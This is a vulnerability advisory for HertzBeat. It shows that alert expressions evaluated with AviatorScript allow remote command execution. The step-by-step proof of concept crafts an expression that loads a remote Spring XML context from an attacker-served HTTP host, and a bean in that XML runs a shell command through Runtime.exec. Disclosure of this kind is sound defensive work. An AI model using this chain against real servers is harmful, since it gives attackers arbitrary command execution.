Summary

Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions, a malicious user can use a crafted alert expression to execute any command on hertzbeat server.

PoC

1. Start a hertzbeat instance by docker

docker run -d -p 1157:1157 --name hertzbeat tancloud/hertzbeat

2. Add an alert define, which has an expression like below

use org.springframework.context.support.ClassPathXmlApplicationContext;new ClassPathXmlApplicationContext("http://host.docker.internal:9999/touch.xml")

3. Create a touch.xml on host machine like below:

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                        http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="evil" class="java.lang.String">
        <constructor-arg value="#{T(Runtime).getRuntime().exec('touch /tmp/pwnned')}"/>
    </bean>
</beans>

4. Start a http server in the same directory to serve touch.xml :

python3 -m http.server 9999

5. Save the alert define, and add a demo http api monitor to trigger the malicious alert expression. Wait for a while, you can see a /tmp/pwnned created in container, proving that the command is executed.

Impact

A malicious user who has access to alert define function can execute any command in hertzbeat instance.